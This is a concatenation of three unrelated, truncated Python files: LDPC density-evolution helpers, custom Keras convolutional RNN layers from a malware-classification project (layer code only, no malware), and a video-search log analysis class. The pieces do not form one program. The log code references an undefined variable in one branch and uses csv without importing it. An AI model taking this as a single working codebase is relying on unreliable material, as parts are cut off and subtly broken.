pm_update, ofl_pos, ofl_neg = phi_trans_inv(pomg_pos, pomg_neg, p_res_zero, z_extn_sup, m_sup)
pm_update = cn_overflow(pm_update, ofl_pos, ofl_neg, m_sup, z_sup)
# normalisation of the pdf to sum 100
pm_update = pm_update / (pm_update.sum() * m_inc)
return pm_update
def phi_trans(m_sup, pv, z_sup):
"""
converts a probability from LLR to log(tanh(L/2)) form
preserving sign information
note, the zero is dropped! ... but not the underflow
:param m_sup: vector that generate the grid of m value, m stands for the
message passed between nodes. m_sup is of form [m_min, m_max, num_ele]
:param pv: pdf of variable nodes
:param z_sup: vector that generate the grid of z value, z is the phi transform of m.
z_sup is of form [z_min, z_max, num_ele].
:return p0_zi, p1_zi:
Ref. [1] Channel Codes classical and modern - - <NAME> and <NAME> Algorithm 9.1 step 3, sub-step 1
"""
z_uni_grid = np.linspace(z_sup[0], z_sup[1], int(z_sup[2]))
m_inc = (m_sup[1] - m_sup[0])/(m_sup[2] - 1)
lw_up_grid = np.zeros([2, int((m_sup[2]-1)/2)])
tmp_min = m_inc/2
tmp_max = m_inc/2 + m_inc * (m_sup[2]-3)/2
lw_up_grid[0, :] = np.linspace(tmp_min, tmp_max, int((m_sup[2]-1)/2))
tmp_min = m_inc/2 + m_inc
tmp_max = m_inc/2 + m_inc * (m_sup[2]-3)/2 + m_inc
lw_up_grid[1, :] = np.linspace(tmp_min, tmp_max, int((m_sup[2]-1)/2))
lw_up_grid[0, 0] = m_inc
lw_up_grid[1, -1] = m_inc * (m_sup[2]-3)/2 + m_inc
z_non_grid = np.log(np.tanh(lw_up_grid/2))
coeff = 2 * np.exp(z_uni_grid)/(1 - np.exp(2 * z_uni_grid))
excess = np.zeros(4)
pv_pos = pv[int((m_sup[2]-1)/2)+1:]
p0_zi, ofl, ufl = pm2pz2pm(m_inc, pv_pos, z_non_grid, z_sup, coeff)
excess[0] = ofl
excess[1] = ufl
pv_neg = pv[:int((m_sup[2] - 1)/2)]
pv_neg_rev = pv_neg[::-1]
p1_zi, ofl, ufl = pm2pz2pm(m_inc, pv_neg_rev, z_non_grid, z_sup, coeff)
excess[2] = ofl
excess[3] = ufl
return p0_zi, p1_zi, excess
def phi_trans_inv(pomg_pos, pomg_neg, p_res_zero, z_extn_sup, m_sup):
"""
converts a log(tanh(L/2)) form random variable to LLR
recall that sign information is preserved
:param pomg_pos: p(\omega) z>0
:param pomg_neg: p(\omega) z<0
:param p_res_zero: probability density of z = 0
:param z_extn_sup: vector that generate the EXTENDED grid of z value due to convolution,
zzextn_sup is of form [z_min, z_max, num_ele].
:param m_sup: vector that generate the grid of m value, m stands for the
message passed between nodes. m_sup is of form [m_min, m_max, num_ele]
:return:
Ref. [1] Channel Codes classical and modern - - <NAME> and <NAME> Algorithm 9.1 step 3, sub-step 3
"""
m_inc = (m_sup[1] - m_sup[0]) / (m_sup[2] - 1)
m_pos_min = m_inc
m_pos_num = int((m_sup[2] - 1)/2)
m_pos_max = m_pos_min + m_inc * (m_pos_num - 1)
m_pos_sup = np.array([m_pos_min, m_pos_max, m_pos_num])
m_pos_grid = np.linspace(m_pos_min, m_pos_max, int(m_pos_num))
z_extn_inc = (z_extn_sup[1] - z_extn_sup[0]) / (z_extn_sup[2] - 1)
lw_up_grid = np.zeros([2, int(z_extn_sup[2])])
tmp_min = z_extn_sup[0] - z_extn_inc / 2
tmp_max = z_extn_sup[0] - z_extn_inc / 2 + z_extn_inc * (z_extn_sup[2] - 1)
lw_up_grid[0, :] = np.linspace(tmp_min, tmp_max, int(z_extn_sup[2]))
tmp_min = z_extn_sup[0] + z_extn_inc / 2
tmp_max = z_extn_sup[0] + z_extn_inc / 2 + z_extn_inc * (z_extn_sup[2] - 1)
lw_up_grid[1, :] = np.linspace(tmp_min, tmp_max, int(z_extn_sup[2]))
lw_up_grid[0, 0] = z_extn_sup[0]
tmp = z_extn_sup[0] + z_extn_inc * (z_extn_sup[2] - 1)
if tmp == 0:
tmp = -1.e-6
lw_up_grid[1, -1] = tmp
# this is just 2 times atanh(lw_up_grid)
m_non_grid = np.log((1+np.exp(lw_up_grid)) / (1-np.exp(lw_up_grid)))
tmp_vc = np.tanh(m_pos_grid / 2)
coeff = 0.5 / tmp_vc * (1 - np.power(tmp_vc, 2))
pm_pos, ofl_pos, ufl_pos = pm2pz2pm(z_extn_inc, pomg_pos, m_non_grid, m_pos_sup, coeff)
pm_neg, ofl_neg, ufl_neg = pm2pz2pm(z_extn_inc, pomg_neg, m_non_grid, m_pos_sup, coeff)
pm_update = np.zeros(m_sup[2])
tmp_vc = pm_neg[:int((m_sup[2] - 1) / 2)]
pm_update[:int((m_sup[2] - 1) / 2)] = tmp_vc[::-1]
pm_update[int((m_sup[2] - 1) / 2 + 1):] = pm_pos
pm_update[int((m_sup[2] - 1) / 2)] = (p_res_zero + ufl_pos + ufl_neg) / m_inc
return pm_update, ofl_pos, ofl_neg
@jit(nopython=True)
def pm2pz2pm(m_inc, pv_half, z_non_grid, z_sup, coeff):
itmax = len(z_non_grid[0])
z_ele_num = int(z_sup[2])
pzi = np.zeros(z_ele_num)
ofl = 0.
ufl = 0.
z_inc = (z_sup[1] - z_sup[0])/(z_ele_num - 1)
min_res_bin = z_sup[0] - 0.5 * z_inc
max_res_bin = z_sup[1] + 0.5 * z_inc
for cc in range(itmax):
ztmp = (z_non_grid[:, cc] - z_sup[0]) / z_inc + 0.5
z_in_z_uni_head = int(ztmp[0])
z_in_z_uni_tail = int(ztmp[1])
flag = 0
partflag = 0
# higher range exceeded by both, this part of pv is added into ofl
if z_in_z_uni_head > z_ele_num-1 and z_in_z_uni_tail > | |
<reponame>santacml/Malware-as-Video
import tensorflow as tf
from keras import backend as K
from keras.engine import InputSpec
from keras.layers import *
from keras.layers import RNN
from keras.engine.topology import Layer
from keras.layers.recurrent import _generate_dropout_mask
from keras.utils.generic_utils import has_arg
from kerasLayers import *
from keras.optimizers import Optimizer
import numpy as np
'''
# from keras documentation
class MyLayer(Layer):
def __init__(self, output_dim, **kwargs):
self.output_dim = output_dim
super(MyLayer, self).__init__(**kwargs)
def build(self, input_shape):
# Create a trainable weight variable for this layer.
self.kernel = self.add_weight(name='kernel',
shape=(input_shape[1], self.output_dim),
initializer='uniform',
trainable=True)
super(MyLayer, self).build(input_shape) # Be sure to call this somewhere!
def call(self, x):
return K.dot(x, self.kernel)
def compute_output_shape(self, input_shape):
return (input_shape[0], self.output_dim)
'''
# copied from Keras source
def _generate_dropout_mask(ones, rate, training=None, count=1):
def dropped_inputs():
return K.dropout(ones, rate)
if count > 1:
return [K.in_train_phase(
dropped_inputs,
ones,
training=training) for _ in range(count)]
return K.in_train_phase(
dropped_inputs,
ones,
training=training)
# based on ConvLSTM2d class
class MinConvRNN(ConvRNN2D):
@interfaces.legacy_convlstm2d_support
def __init__(self, filters,
kernel_size,
strides=(1, 1),
padding='valid',
data_format=None,
dilation_rate=(1, 1),
activation='hard_sigmoid',
recurrent_activation='hard_sigmoid',
use_bias=True,
kernel_initializer='glorot_uniform',
recurrent_initializer='orthogonal',
bias_initializer='zeros',
unit_forget_bias=True,
kernel_regularizer=None,
recurrent_regularizer=None,
bias_regularizer=None,
activity_regularizer=None,
kernel_constraint=None,
recurrent_constraint=None,
bias_constraint=None,
return_sequences=False,
go_backwards=False,
stateful=False,
dropout=0.,
recurrent_dropout=0.,
**kwargs):
cell = MinConvRNNCell(filters=filters,
kernel_size=kernel_size,
strides=strides,
padding=padding,
data_format=data_format,
dilation_rate=dilation_rate,
activation=activation,
recurrent_activation=recurrent_activation,
use_bias=use_bias,
kernel_initializer=kernel_initializer,
recurrent_initializer=recurrent_initializer,
bias_initializer=bias_initializer,
unit_forget_bias=unit_forget_bias,
kernel_regularizer=kernel_regularizer,
recurrent_regularizer=recurrent_regularizer,
bias_regularizer=bias_regularizer,
kernel_constraint=kernel_constraint,
recurrent_constraint=recurrent_constraint,
bias_constraint=bias_constraint,
dropout=dropout,
recurrent_dropout=recurrent_dropout)
super(MinConvRNN, self).__init__(cell,
return_sequences=return_sequences,
go_backwards=go_backwards,
stateful=stateful,
**kwargs)
self.activity_regularizer = regularizers.get(activity_regularizer)
def call(self, inputs, mask=None, training=None, initial_state=None):
return super(MinConvRNN, self).call(inputs,
mask=mask,
training=training,
initial_state=initial_state)
@property
def filters(self):
return self.cell.filters
@property
def kernel_size(self):
return self.cell.kernel_size
@property
def strides(self):
return self.cell.strides
@property
def padding(self):
return self.cell.padding
@property
def data_format(self):
return self.cell.data_format
@property
def dilation_rate(self):
return self.cell.dilation_rate
@property
def activation(self):
return self.cell.activation
@property
def recurrent_activation(self):
return self.cell.recurrent_activation
@property
def use_bias(self):
return self.cell.use_bias
@property
def kernel_initializer(self):
return self.cell.kernel_initializer
@property
def recurrent_initializer(self):
return self.cell.recurrent_initializer
@property
def bias_initializer(self):
return self.cell.bias_initializer
@property
def unit_forget_bias(self):
return self.cell.unit_forget_bias
@property
def kernel_regularizer(self):
return self.cell.kernel_regularizer
@property
def recurrent_regularizer(self):
return self.cell.recurrent_regularizer
@property
def bias_regularizer(self):
return self.cell.bias_regularizer
@property
def kernel_constraint(self):
return self.cell.kernel_constraint
@property
def recurrent_constraint(self):
return self.cell.recurrent_constraint
@property
def bias_constraint(self):
return self.cell.bias_constraint
@property
def dropout(self):
return self.cell.dropout
@property
def recurrent_dropout(self):
return self.cell.recurrent_dropout
def get_config(self):
config = {'filters': self.filters,
'kernel_size': self.kernel_size,
'strides': self.strides,
'padding': self.padding,
'data_format': self.data_format,
'dilation_rate': self.dilation_rate,
'activation': activations.serialize(self.activation),
'recurrent_activation': activations.serialize(self.recurrent_activation),
'use_bias': self.use_bias,
'kernel_initializer': initializers.serialize(self.kernel_initializer),
'recurrent_initializer': initializers.serialize(self.recurrent_initializer),
'bias_initializer': initializers.serialize(self.bias_initializer),
'unit_forget_bias': self.unit_forget_bias,
'kernel_regularizer': regularizers.serialize(self.kernel_regularizer),
'recurrent_regularizer': regularizers.serialize(self.recurrent_regularizer),
'bias_regularizer': regularizers.serialize(self.bias_regularizer),
'activity_regularizer': regularizers.serialize(self.activity_regularizer),
'kernel_constraint': constraints.serialize(self.kernel_constraint),
'recurrent_constraint': constraints.serialize(self.recurrent_constraint),
'bias_constraint': constraints.serialize(self.bias_constraint),
'dropout': self.dropout,
'recurrent_dropout': self.recurrent_dropout}
base_config = super(MinConvRNN, self).get_config()
del base_config['cell']
return dict(list(base_config.items()) + list(config.items()))
@classmethod
def from_config(cls, config):
return cls(**config)
class MinConvRNNCell(Layer):
def __init__(self, filters,
kernel_size,
strides=(1, 1),
padding='valid',
data_format=None,
dilation_rate=(1, 1),
activation='tanh',
recurrent_activation='hard_sigmoid',
use_bias=True,
kernel_initializer='glorot_uniform',
recurrent_initializer='orthogonal',
bias_initializer='zeros',
unit_forget_bias=True,
kernel_regularizer=None,
recurrent_regularizer=None,
bias_regularizer=None,
kernel_constraint=None,
recurrent_constraint=None,
bias_constraint=None,
dropout=0.,
recurrent_dropout=0.,
**kwargs):
super(MinConvRNNCell, self).__init__(**kwargs)
self.filters = filters
self.kernel_size = conv_utils.normalize_tuple(kernel_size, 2, 'kernel_size')
self.strides = conv_utils.normalize_tuple(strides, 2, 'strides')
self.padding = conv_utils.normalize_padding(padding)
self.data_format = conv_utils.normalize_data_format(data_format)
self.dilation_rate = conv_utils.normalize_tuple(dilation_rate, 2, 'dilation_rate')
self.activation = activations.get(activation)
self.recurrent_activation = activations.get(recurrent_activation)
self.use_bias = use_bias
self.kernel_initializer = initializers.get(kernel_initializer)
self.recurrent_initializer = initializers.get(recurrent_initializer)
self.bias_initializer = initializers.get(bias_initializer)
self.unit_forget_bias = unit_forget_bias
self.kernel_regularizer = regularizers.get(kernel_regularizer)
self.recurrent_regularizer = regularizers.get(recurrent_regularizer)
self.bias_regularizer = regularizers.get(bias_regularizer)
self.kernel_constraint = constraints.get(kernel_constraint)
self.recurrent_constraint = constraints.get(recurrent_constraint)
self.bias_constraint = constraints.get(bias_constraint)
if K.backend() == 'theano' and (dropout or recurrent_dropout):
warnings.warn(
'RNN dropout is no longer supported with the Theano backend '
'due to technical limitations. '
'You can either set `dropout` and `recurrent_dropout` to 0, '
'or use the TensorFlow backend.')
dropout = 0.
recurrent_dropout = 0.
self.dropout = min(1., max(0., dropout))
self.recurrent_dropout = min(1., max(0., recurrent_dropout))
self.state_size = (self.filters, self.filters)
self._dropout_mask = None
self._recurrent_dropout_mask = None
def build(self, input_shape):
if self.data_format == 'channels_first':
channel_axis = 1
else:
channel_axis = -1
if input_shape[channel_axis] is None:
raise ValueError('The channel dimension of the inputs '
'should be defined. Found `None`.')
input_dim = input_shape[channel_axis]
kernel_shape = self.kernel_size + (input_dim, self.filters)
self.kernel_shape = kernel_shape
recurrent_kernel_shape = self.kernel_size + (self.filters, self.filters)
self.kernel = self.add_weight(shape=kernel_shape,
initializer=self.kernel_initializer,
name='kernel',
dtype="float32",
regularizer=self.kernel_regularizer,
constraint=self.kernel_constraint)
# self.kernel2 = self.add_weight(shape=recurrent_kernel_shape,
# initializer=self.kernel_initializer,
# name='kernel',
# dtype="float32",
# regularizer=self.kernel_regularizer,
# constraint=self.kernel_constraint)
bias_initializer = self.bias_initializer
self.bias = self.add_weight(shape=(self.filters ,),
name='bias',
dtype="float32",
initializer=bias_initializer,
regularizer=self.bias_regularizer,
constraint=self.bias_constraint)
self.built = True
def call(self, inputs, states, training=None):
self.dropout = .3
self._dropout_mask = _generate_dropout_mask(
K.ones_like(inputs),
self.dropout,
training=training)
inputs_dropped = inputs * self._dropout_mask
prev_output = states[0]
prev_convIn = states[1]
# FOR <NAME>:
# the best addconv:
convIn = self.input_conv(inputs_dropped, self.kernel, b=self.bias, padding=self.padding)
in_sum = convIn + prev_convIn
output = self.activation(in_sum)
# output = in_sum
# convIn = self.input_conv(inputs, self.kernel, b=self.bias, padding=self.padding)
# in_sum = convIn + self.recurrent_conv(prev_output, self.kernel2)
# output = self.activation(in_sum)
return output, [output, in_sum]
def input_conv(self, x, w, b=None, padding='valid'):
conv_out = K.conv2d(x, w, strides=self.strides,
padding=padding,
data_format=self.data_format,)
if b is not None:
conv_out = K.bias_add(conv_out, b,
data_format=self.data_format)
return conv_out
def recurrent_conv(self, x, w):
conv_out = K.conv2d(x, w, strides=(1, 1),
padding='same',
data_format=self.data_format)
return conv_out
def get_config(self):
config = {'filters': self.filters,
'kernel_size': self.kernel_size,
'strides': self.strides,
'padding': self.padding,
'data_format': self.data_format,
'dilation_rate': self.dilation_rate,
'activation': activations.serialize(self.activation),
'recurrent_activation': activations.serialize(self.recurrent_activation),
'use_bias': self.use_bias,
'kernel_initializer': initializers.serialize(self.kernel_initializer),
'recurrent_initializer': initializers.serialize(self.recurrent_initializer),
'bias_initializer': initializers.serialize(self.bias_initializer),
'unit_forget_bias': self.unit_forget_bias,
'kernel_regularizer': regularizers.serialize(self.kernel_regularizer),
'recurrent_regularizer': regularizers.serialize(self.recurrent_regularizer),
'bias_regularizer': regularizers.serialize(self.bias_regularizer),
'kernel_constraint': constraints.serialize(self.kernel_constraint),
'recurrent_constraint': constraints.serialize(self.recurrent_constraint),
'bias_constraint': constraints.serialize(self.bias_constraint),
'dropout': self.dropout,
'recurrent_dropout': self.recurrent_dropout}
base_config = super(MinConvRNNCell, self).get_config()
return dict(list(base_config.items()) + list(config.items()))
def compute_output_shape(self, input_shape):
return input_shape[:-1] + (self.filters,)
class MinConvRNNTrainableHidden(ConvRNN2D):
@interfaces.legacy_convlstm2d_support
def __init__(self, filters,
kernel_size,
strides=(1, 1),
padding='valid',
data_format=None,
dilation_rate=(1, 1),
activation='hard_sigmoid',
recurrent_activation='hard_sigmoid',
use_bias=True,
kernel_initializer='glorot_uniform',
recurrent_initializer='orthogonal',
bias_initializer='zeros',
unit_forget_bias=True,
kernel_regularizer=None,
recurrent_regularizer=None,
bias_regularizer=None,
activity_regularizer=None,
kernel_constraint=None,
recurrent_constraint=None,
bias_constraint=None,
return_sequences=False,
go_backwards=False,
stateful=False,
dropout=0.,
recurrent_dropout=0.,
**kwargs):
cell = MinConvRNNTrainableHiddenCell(filters=filters,
kernel_size=kernel_size,
strides=strides,
padding=padding,
data_format=data_format,
dilation_rate=dilation_rate,
activation=activation,
recurrent_activation=recurrent_activation,
use_bias=use_bias,
kernel_initializer=kernel_initializer,
recurrent_initializer=recurrent_initializer,
bias_initializer=bias_initializer,
unit_forget_bias=unit_forget_bias,
kernel_regularizer=kernel_regularizer,
recurrent_regularizer=recurrent_regularizer,
bias_regularizer=bias_regularizer,
kernel_constraint=kernel_constraint,
recurrent_constraint=recurrent_constraint,
bias_constraint=bias_constraint,
dropout=dropout,
recurrent_dropout=recurrent_dropout)
super(MinConvRNNTrainableHidden, self).__init__(cell,
return_sequences=return_sequences,
go_backwards=go_backwards,
stateful=stateful,
**kwargs)
self.activity_regularizer = regularizers.get(activity_regularizer)
def call(self, inputs, mask=None, training=None, initial_state=None):
return super(MinConvRNNTrainableHidden, self).call(inputs,
mask=mask,
training=training,
initial_state=initial_state)
@property
def filters(self):
return self.cell.filters
@property
def kernel_size(self):
return self.cell.kernel_size
@property
def strides(self):
return self.cell.strides
@property
def padding(self):
return self.cell.padding
@property
def data_format(self):
return self.cell.data_format
@property
def dilation_rate(self):
return self.cell.dilation_rate
@property
def activation(self):
return self.cell.activation
@property
def recurrent_activation(self):
return self.cell.recurrent_activation
@property
def use_bias(self):
return self.cell.use_bias
@property
def kernel_initializer(self):
return self.cell.kernel_initializer
@property
def recurrent_initializer(self):
return self.cell.recurrent_initializer
@property
def bias_initializer(self):
return self.cell.bias_initializer
@property
def unit_forget_bias(self):
return self.cell.unit_forget_bias
@property
def kernel_regularizer(self):
return self.cell.kernel_regularizer
@property
def recurrent_regularizer(self):
return self.cell.recurrent_regularizer
@property
def bias_regularizer(self):
return self.cell.bias_regularizer
@property
def kernel_constraint(self):
return self.cell.kernel_constraint
@property
def recurrent_constraint(self):
return self.cell.recurrent_constraint
@property
def bias_constraint(self):
return self.cell.bias_constraint
@property
def dropout(self):
return self.cell.dropout
@property
def recurrent_dropout(self):
return self.cell.recurrent_dropout
def get_config(self):
config = {'filters': self.filters,
'kernel_size': self.kernel_size,
'strides': self.strides,
'padding': self.padding,
'data_format': self.data_format,
'dilation_rate': self.dilation_rate,
'activation': activations.serialize(self.activation),
'recurrent_activation': activations.serialize(self.recurrent_activation),
'use_bias': self.use_bias,
'kernel_initializer': initializers.serialize(self.kernel_initializer),
'recurrent_initializer': initializers.serialize(self.recurrent_initializer),
'bias_initializer': initializers.serialize(self.bias_initializer),
'unit_forget_bias': self.unit_forget_bias,
'kernel_regularizer': regularizers.serialize(self.kernel_regularizer),
'recurrent_regularizer': regularizers.serialize(self.recurrent_regularizer),
'bias_regularizer': regularizers.serialize(self.bias_regularizer),
'activity_regularizer': regularizers.serialize(self.activity_regularizer),
'kernel_constraint': constraints.serialize(self.kernel_constraint),
'recurrent_constraint': constraints.serialize(self.recurrent_constraint),
'bias_constraint': constraints.serialize(self.bias_constraint),
'dropout': self.dropout,
'recurrent_dropout': self.recurrent_dropout}
base_config = super(MinConvRNNTrainableHidden, self).get_config()
del base_config['cell']
return dict(list(base_config.items()) + list(config.items()))
@classmethod
def from_config(cls, config):
return cls(**config)
class MinConvRNNTrainableHiddenCell(Layer):
def __init__(self, filters,
kernel_size,
strides=(1, 1),
padding='valid',
data_format=None,
dilation_rate=(1, 1),
activation='tanh',
recurrent_activation='hard_sigmoid',
use_bias=True,
kernel_initializer='glorot_uniform',
recurrent_initializer='orthogonal',
bias_initializer='zeros',
unit_forget_bias=True,
kernel_regularizer=None,
recurrent_regularizer=None,
bias_regularizer=None,
kernel_constraint=None,
recurrent_constraint=None,
bias_constraint=None,
dropout=0.,
recurrent_dropout=0.,
**kwargs):
super(MinConvRNNTrainableHiddenCell, self).__init__(**kwargs)
self.filters = filters
self.kernel_size = conv_utils.normalize_tuple(kernel_size, 2, 'kernel_size')
self.strides = conv_utils.normalize_tuple(strides, 2, 'strides')
self.padding = conv_utils.normalize_padding(padding)
self.data_format = conv_utils.normalize_data_format(data_format)
self.dilation_rate = conv_utils.normalize_tuple(dilation_rate, 2, 'dilation_rate')
self.activation = activations.get(activation)
self.recurrent_activation = activations.get(recurrent_activation)
self.use_bias = use_bias
self.kernel_initializer = initializers.get(kernel_initializer)
self.recurrent_initializer = initializers.get(recurrent_initializer)
self.bias_initializer = initializers.get(bias_initializer)
self.unit_forget_bias = unit_forget_bias
self.kernel_regularizer = regularizers.get(kernel_regularizer)
self.recurrent_regularizer = regularizers.get(recurrent_regularizer)
self.bias_regularizer = regularizers.get(bias_regularizer)
self.kernel_constraint = constraints.get(kernel_constraint)
self.recurrent_constraint = constraints.get(recurrent_constraint)
self.bias_constraint = constraints.get(bias_constraint)
if K.backend() == 'theano' and (dropout or recurrent_dropout):
warnings.warn(
'RNN dropout is no longer supported with the Theano backend '
'due to technical limitations. '
'You can either set `dropout` and `recurrent_dropout` to 0, '
'or use the TensorFlow backend.')
dropout = 0.
recurrent_dropout = 0.
self.dropout = min(1., max(0., dropout))
self.recurrent_dropout = min(1., max(0., recurrent_dropout))
self.state_size = (self.filters, self.filters)
self._dropout_mask = None
self._recurrent_dropout_mask = None
def build(self, input_shape):
if self.data_format == 'channels_first':
channel_axis = 1
else:
channel_axis = -1
if input_shape[channel_axis] is None:
raise ValueError('The channel dimension of the inputs '
'should be defined. Found `None`.')
input_dim = input_shape[channel_axis]
kernel_shape = self.kernel_size + (input_dim, self.filters)
self.kernel_shape = kernel_shape
recurrent_kernel_shape = self.kernel_size + (self.filters, self.filters)
self.kernel = | |
<gh_stars>1-10
import numpy as np
import json
import os
import matplotlib.pyplot as plt
import seaborn as sb
import shutil
import pprint
pp = pprint.PrettyPrinter(indent=4)
# ---
import config
from constants import *
import utils
from raw_log_types import *
from results import *
from tasks import *
from task_results import *
from submits import *
from summary import *
class VbsVis:
def __init__(self):
# Load cached if available
cached_file = os.path.join(config.cache_dir(), "vbs.pkl")
if (os.path.exists(cached_file)):
print(f"Loading cached instance from {cached_file}...")
cached_instance = utils.load_obj(cached_file)
# pp.pprint(vars(cached_instance))
self.verbose = cached_instance.verbose
self._rewrite = cached_instance._rewrite
self._tasks = cached_instance._tasks
self._raw_summaries = cached_instance._raw_summaries
self._summaries = cached_instance._summaries
self._results = cached_instance._results
self._task_results = cached_instance._task_results
self._verdicts = cached_instance._verdicts
# Else load everything
else:
self.verbose = False
self._rewrite = False
self._tasks = TaskDefs.parse_tasks(config.TASKS_JSON,
config.TASKS_STARTS,
config.TASK_MAPPING,
config.thumbs_list_filepath(),
verbose=self.verbose)
self._verdicts = Verdicts(config.VERDICT_FILEPATH)
self._raw_summaries = RawSummaries()
self._summaries = Summaries(self._tasks)
self._results = Results()
self._task_results = TaskResults(self._tasks)
# --- Getters/setters
def raw_summaries(self) -> Summaries:
return self._raw_summaries
def summaries(self) -> Summaries:
return self._summaries
def task_submits(self) -> dict:
return self._task_results._submits
def task_results(self) -> TaskResults:
return self._task_results
def results(self) -> Results:
return self._results
def tasks(self) -> TaskDefs:
return self._tasks
def get_relevance_feedback_transitions(self, teams=None, users=None, tasks=None,
time=(0.0, 99999.0), timestamp=(0, 16242180131780), all=True,
file=None, file2=None, file_all=None, max=1154038
):
# ANY-> liked
any2liked = []
# liked-> liked
liked2liked = []
for team, team_dict in self.summaries().summaries().items():
if ((teams != None) and (not (team in teams))):
continue
for user, task_actions in team_dict.items():
if ((users != None) and (not (user in users))):
continue
for task_name, actions in task_actions.items():
if ((tasks != None) and (not (task_name in tasks))):
continue
task_results = self.task_results().task_results(team, user, task_name, time, timestamp)
prev = None
prev_changed = []
for r in task_results:
changed = r.c_changed()
pos_vid, pos_frame, _ = r.positions()
unpos_vid,unpos_frame, _ = prev.positions() if (prev != None) else (max, max, 0)
if (pos_vid == None):
continue
if "LK" in changed and len(changed) == 1 and (not "NN" in prev_changed):
if (not "LK" in prev_changed):
trans = f"{prev_changed} -> {changed}"
any2liked.append([r.timestamp(), user, pos_vid, pos_frame, unpos_vid, unpos_frame, trans])
else:
if all:
liked2liked.append([r.timestamp(), user, pos_vid, pos_frame, unpos_vid, unpos_frame, trans])
prev = r
prev_changed = changed
if (file!= None):
with open(file, "w", newline="") as ofs:
writer = csv.writer(ofs, delimiter=',', quotechar='"', quoting=csv.QUOTE_MINIMAL)
writer.writerow(["ID","user","pos_video","pos_frame","unpos_video","unpos_frame"])
for x in any2liked:
writer.writerow(x)
if (file2!= None):
with open(file2, "w", newline="") as ofs:
writer = csv.writer(ofs, delimiter=',', quotechar='"', quoting=csv.QUOTE_MINIMAL)
writer.writerow(["ID","user","pos_video","pos_frame","unpos_video","unpos_frame"])
for x in liked2liked:
writer.writerow(x)
if (file_all!= None):
with open(file_all, "w", newline="") as ofs:
writer = csv.writer(ofs, delimiter=',', quotechar='"', quoting=csv.QUOTE_MINIMAL)
writer.writerow(["ID","user","pos_video","pos_frame","unpos_video","unpos_frame"])
for x in any2liked:
writer.writerow(x)
for x in liked2liked:
writer.writerow(x)
return any2liked + liked2liked
# --- Printers
def print_task_course(self, teams=None, users=None, tasks=None, time=(0.0, 99999.0), timestamp=(0, 16242180131780), events=["r", "s", "a"]):
print("***############################***")
print("***###*** TASK COURSES ***###***")
print("***############################***")
for team, team_dict in self.summaries().summaries().items():
if ((teams != None) and (not (team in teams))):
continue
print(f"--- {team} ---")
for user, task_actions in team_dict.items():
if ((users != None) and (not (user in users))):
continue
print(f"\t--- {user} ---")
for task_name, actions in task_actions.items():
if ((tasks != None) and (not (task_name in tasks))):
continue
print(f"\t\t--- {task_name} ---\n")
actions = []
if ("a" in events):
actions = list(map(lambda x: (x.elapsed(), x), self.summaries().summary(team, user, task_name, time, timestamp)))
task_results = []
if ("r" in events):
task_results = list(map(lambda x: (x.elapsed(), x), self.task_results().task_results(team, user, task_name, time, timestamp)))
submits = []
if ("s" in events):
submits = list(map(lambda x: (x.elapsed(), x), self.task_results().task_submits(team, user, task_name, time, timestamp)))
all = sorted(actions + submits + task_results, key= lambda x: x[0])
for x in all:
if isinstance(x, SummaryPoint):
print(x[1])
elif isinstance(x, ResultPoint):
print(x[1])
else:
print(x[1])
def task_course(self, team, user, task_name, time=(0.0, 99999.0), timestamp=(0, 16242180131780), events=["r", "s", "a"]):
actions = []
if "a" in events:
actions = list(map(lambda x: (x.elapsed(), x), self.summaries().summary(team, user, task_name, time, timestamp)))
task_results = []
if "r" in events:
task_results = list(map(lambda x: (x.elapsed(), x), self.task_results().task_results(team, user, task_name, time, timestamp)))
submits = []
if "r" in events:
submits = list(map(lambda x: (x.elapsed(), x), self.task_results().task_submits(team, user, task_name, time, timestamp)))
all = sorted(actions + submits + task_results, key= lambda x: x[0])
return all
def task_actions_array(self, team, user, task_name, time=(0.0, 99999.0), timestamp=(0, 16242180131780)):
times = []
types = []
actions = self.task_course(team, user, task_name, time, timestamp, events=["a"])
for el, a in actions:
times.append(a.elapsed())
types.append(a.action())
return times, types
def print_tasks(self, tasks=None):
self._tasks.print(tasks)
def task_to_CSV(self, file):
self._tasks.to_CSV(file)
def print_results(self, team, user, fr, to):
self.results().print_results(team, user, fr, to)
def print_tool_features(self, teams=None):
self.task_results().print_features(teams)
def print_summary(self, teams=None, users=None, tasks=None, time=(0.0, 99999.0), timestamp=(0, 16242180131780)):
self.summaries().print(teams, users, tasks, time, timestamp)
def print_task_results(self, teams=None, users=None, tasks=None):
self.task_results().print(teams, users, tasks)
def print_task_results_arrays(self, teams=None, users=None, tasks=None):
self.task_results().print_arrays(teams, users, tasks)
def print_task_submits(self, teams=None, users=None, tasks=None):
self.task_results().print_submits(teams, users, tasks)
def print_task_submits_arrays(self, teams=None, users=None, tasks=None):
self.task_results().print_submits_arrays(teams, users, tasks)
def print_queries(self):
for q in config.queries():
print(q)
# --- Statics
@staticmethod
def help():
print("<<< ###################### >>>")
print("<<< ### VBS Viz ### >>>")
print("<<< ###################### >>>\n")
print("INFO QUERIES:\n")
print("vbs.print_tasks()")
print("\t Prints the overview of the tasks that were presented.")
print("PLOTS:\n")
print("vbs.plot_timelines()")
print("\t Plots timelines for all parsed teams/users/tasks.")
@staticmethod
def cache(instance):
cached_file = os.path.join(config.cache_dir(), "vbs.pkl")
utils.save_obj(cached_file, instance)
print(f"Instance cached to {cached_file}...")
@staticmethod
def flush_cache():
cache_dir = config.cache_dir()
try:
shutil.rmtree(cache_dir)
except:
print('Error while deleting directory')
# ---
def parse_team(self,
team_name: str,
team_names: list,
verbose=False,
rewrite=False,
validate_fix=False,
generate_DRES=False,
validate_diff=False):
self.verbose = verbose
self._rewrite = rewrite
print("==============\nTEAM: {}\n".format(team_name))
if (team_name in self.task_results().task_results()):
print("??? This team is already parsed. Cached maybe? ???")
return
### main()
if (validate_fix):
self.validate_and_fix_input_data(team_name, team_names)
if (validate_diff):
self.calculate_server_ts_diff(team_name, team_names)
if (generate_DRES):
self.generate_DRES_logs(team_name, team_names)
self.parse_logs(team_name, team_names)
###
self.verbose = False
self._rewrite = False
def parse_logs(self, team_name: str, team_names: list):
print("%%% PARSING %%%")
for user_name in team_names:
path = config.path(user_name)
print("---\n+++ {} +++ \nDATA: {} \n".format(user_name, path))
self.parse_user_submits(team_name, user_name, path)
for user_name in team_names:
print("---\n+++ {} +++ \nDATA: {} \n".format(user_name, path))
path = config.path(user_name)
self.parse_user_summary(team_name, user_name, path, self.task_submits())
self.parse_user_results(team_name, user_name, path, self.task_submits(), self.summaries())
print("%%% DONE! %%%")
def validate_and_fix_input_data(self, team_name: str, team_names: list):
print("%%% VALIDATING & FIXING %%%")
for user_name in team_names:
path = config.path(user_name)
